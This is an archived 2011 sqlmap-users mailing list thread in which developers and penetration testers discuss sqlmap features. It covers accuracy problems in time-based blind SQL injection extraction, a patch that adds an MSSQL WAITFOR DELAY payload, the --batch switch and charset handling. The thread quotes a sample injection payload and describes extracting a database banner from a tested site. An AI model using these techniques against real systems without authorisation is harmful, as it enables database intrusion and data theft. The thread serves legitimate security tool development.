[05:56:40] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 18 times [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData' [*] shutting down at: 05:56:40 -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:23:20
|
now i am really interested as hell :)) could you please just send one proper payload (use -v 3) which uses this vector? "i want to know" On Tue, Jan 18, 2011 at 1:02 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Steve. > > Thank you for your patch but I am not sure from SQL's perspective how > this could work? > > So, basically, you are proposing time based sql injection payload (e.g.): > > IF(1=1) WAITFOR DELAY '0:0:1' > > and to be honest, I am not sure in which form, other than "stacked" > this could fit in?? > > KR > > On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote: >> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, >> which was throwing unrelated 500 errors on the ASP application I was >> testing due to the semicolons. This worked for data extraction for me. >> >> Not sure if one or the other of them should be moved to a higher level >> to limit testing time in the general case? Anyone have more experience >> with which one would be more useful? >> >> svn diff based on revision 3014. >> >> Patch licensed under GPLv2 to match the project license, if the patch is >> used. I assume that's the normal procedure for this project? >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> ------------------------------------------------------------------------------ >> Protect Your Site and Customers from Malware Attacks >> Learn about various malware tactics and how to avoid them. Understand >> malware threats, the impact they can have on your business, and how you >> can protect your company and customers by using code signing. >> http://p.sf.net/sfu/oracle-sfdevnl >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:02:59
|
Hi Steve. Thank you for your patch but I am not sure from SQL's perspective how this could work? So, basically, you are proposing time based sql injection payload (e.g.): IF(1=1) WAITFOR DELAY '0:0:1' and to be honest, I am not sure in which form, other than "stacked" this could fit in?? KR On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote: > Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, > which was throwing unrelated 500 errors on the ASP application I was > testing due to the semicolons. This worked for data extraction for me. > > Not sure if one or the other of them should be moved to a higher level > to limit testing time in the general case? Anyone have more experience > with which one would be more useful? > > svn diff based on revision 3014. > > Patch licensed under GPLv2 to match the project license, if the patch is > used. I assume that's the normal procedure for this project? > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-17 23:43:12
|
Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, which was throwing unrelated 500 errors on the ASP application I was testing due to the semicolons. This worked for data extraction for me. Not sure if one or the other of them should be moved to a higher level to limit testing time in the general case? Anyone have more experience with which one would be more useful? svn diff based on revision 3014. Patch licensed under GPLv2 to match the project license, if the patch is used. I assume that's the normal procedure for this project? -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-17 23:34:41
|
...but still, i must say that this is quite good idea: "One way to increase the quality with little speed overhead would be an option to verify the character result of the blind binary search using an equals query and restarting just that character if the answer is not correct." and we'll try to implement it kr On Tue, Jan 18, 2011 at 12:31 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Steve. > > We can consider some mechanisms to improve it, but first of all keep it real. > > We are talking about a most delicate sql injection technique which is > highly prone to "outside entropy". It's precision is directly > inversely proportional to the time needed to retrieve all data, and > nobody wants to wait for some "useful" data "too long". > > So, IMHO, I am aware that here and there some character can go wrong > (either caused by line used or some change of the web servers load) > but still info retrieved is prone to personal filtration (in this case > everybody is aware that that 'A' there is a junk character). > > KR > > On Tue, Jan 18, 2011 at 12:17 AM, Steve Pinkham <ste...@gm...> wrote: >> First off, I'm loving the newest versions of sqlmap.. It's even better >> than ever, and by far my favourite tool in the space. >> >> Now that time-based injection is better supported, one of the side >> effects is that the quality of results has gone down for me. For >> example on a site I'm testing, the banner results are: >> >> Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64) >> Where is should probably be >> Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) >> >> And this is with a 20 second delay! >> >> One way to increase the quality with little speed overhead would be an >> option to verify the character result of the blind binary search using >> an equals query and restarting just that character if the answer is not >> correct. >> >> This should only add one request per character, and be much more time >> efficient than using a longer delay, using a safe url in between every >> request, or other mitigations that would increase the result quality at >> higher cost. >> >> Any thoughts? >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> >> ------------------------------------------------------------------------------ >> Protect Your Site and Customers from Malware Attacks >> Learn about various malware tactics and how to avoid them. Understand >> malware threats, the impact they can have on your business, and how you >> can protect your company and customers by using code signing. >> http://p.sf.net/sfu/oracle-sfdevnl >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2011-01-17 23:31:43
|
Hi Steve. We can consider some mechanisms to improve it, but first of all keep it real. We are talking about a most delicate sql injection technique which is highly prone to "outside entropy". It's precision is directly inversely proportional to the time needed to retrieve all data, and nobody wants to wait for some "useful" data "too long". So, IMHO, I am aware that here and there some character can go wrong (either caused by line used or some change of the web servers load) but still info retrieved is prone to personal filtration (in this case everybody is aware that that 'A' there is a junk character). KR On Tue, Jan 18, 2011 at 12:17 AM, Steve Pinkham <ste...@gm...> wrote: > First off, I'm loving the newest versions of sqlmap.. It's even better > than ever, and by far my favourite tool in the space. > > Now that time-based injection is better supported, one of the side > effects is that the quality of results has gone down for me. For > example on a site I'm testing, the banner results are: > > Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64) > Where is should probably be > Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) > > And this is with a 20 second delay! > > One way to increase the quality with little speed overhead would be an > option to verify the character result of the blind binary search using > an equals query and restarting just that character if the answer is not > correct. > > This should only add one request per character, and be much more time > efficient than using a longer delay, using a safe url in between every > request, or other mitigations that would increase the result quality at > higher cost. > > Any thoughts? > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-17 23:17:21
|
First off, I'm loving the newest versions of sqlmap.. It's even better than ever, and by far my favourite tool in the space. Now that time-based injection is better supported, one of the side effects is that the quality of results has gone down for me. For example on a site I'm testing, the banner results are: Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64) Where is should probably be Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) And this is with a 20 second delay! One way to increase the quality with little speed overhead would be an option to verify the character result of the blind binary search using an equals query and restarting just that character if the answer is not correct. This should only add one request per character, and be much more time efficient than using a longer delay, using a safe url in between every request, or other mitigations that would increase the result quality at higher cost. Any thoughts? -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-17 22:47:24
|
Hi Antonios. You probably want to use switch --batch: "--batch Never ask for user input, use the default behaviour" KR On Mon, Jan 17, 2011 at 10:36 PM, Antonios Atlasis <ant...@gm...> wrote: > > Hello to the list. > > while trying to parse targets from webscarab logs, I'd like to ask you if > there is an option to automatically answer "Yes" to sqlmap questions to test > the several URLs. > > Thanks in advance > > Antonios > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Antonios A. <ant...@gm...> - 2011-01-17 21:36:47
|
Hello to the list. while trying to parse targets from webscarab logs, I'd like to ask you if there is an option to automatically answer "Yes" to sqlmap questions to test the several URLs. Thanks in advance Antonios |
From: Miroslav S. <mir...@gm...> - 2011-01-17 14:52:09
|
Hi all. I have a general question to all those pentesters that are retrieving data from sites with "funny" charset encodings (...russian, chinese...). What's should be the general "consensus" for data retrieval: A) assume that the backend DBMS uses the "utf8" charset encoding or B) treat data retrieved with the same encoding as used in the page or C) find out the proper collation used and use that one? (i am not a fan of this one :) or D) don't care (some people tend to use mixed collations which is quite romantic) Also, I would like to ask you all to try out the latest revision with cases that could be problematic and report impressions. Kind regards |
From: <bu...@gm...> - 2011-01-17 00:30:49
|
On 01/17/2011 12:25 AM, Miroslav Stampar wrote: > hi buawig. > > we've done some heavy development in other parts and haven't updated > --sql-shell accordingly. i can only say that we'll try to do our best and > update it in couple of weeks (not a trivial one as now it's only supported > by the part of sqlmap with blind based injections). OK. Thank you for your fast reply and committing r3004. |